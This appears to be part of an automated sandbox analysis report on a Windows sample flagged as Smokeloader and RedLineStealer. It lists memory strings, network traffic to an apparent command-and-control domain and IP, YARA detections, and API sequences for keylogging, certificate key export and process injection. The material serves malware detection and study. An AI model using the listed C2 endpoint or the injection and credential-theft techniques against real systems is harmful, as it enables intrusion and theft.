                Source: explorer.exe, 00000001.00000000.1728229982.000000000C99F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: explorer.exe, 00000001.00000000.1728229982.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723130292.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000001.00000000.1726201886.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                Source: explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 00000001.00000000.1726201886.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.000000000358E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/earch.phpx
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/s
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2875600167.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4140857927.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4139493088.0000000000498000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4140362492.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4139073414.00000000010E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.php
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.phpG
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2875600167.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4140857927.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4139493088.0000000000498000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4140362492.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4139073414.00000000010E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
                Source: explorer.exe, 0000000D.00000002.2910898340.0000000003530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com:443/search.phpe
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000001.00000000.1728229982.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                Source: explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                Source: explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49769 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49770 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49773 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49776 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49779 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49781 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49783 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49789 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49791 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49793 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49795 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 412, type: MEMORYSTR
                Source: Yara matchFile source: 9.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.38E5.exe.610e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.38E5.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.uievsid.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.38E5.exe.730000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.uievsid.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00A3162B GetKeyboardState,ToUnicode,17_2_00A3162B
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB43220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,10_2_00007FF6AAB43220

                System Summary

                barindex
                Source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000021.00000002.4141842433.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000022.00000002.3707763574.00000000027CF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000022.00000002.3707006171.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000021.00000002.4143586325.00000000006B2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
                Source: C:\Users\user\Desktop\veEGy9FijY.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
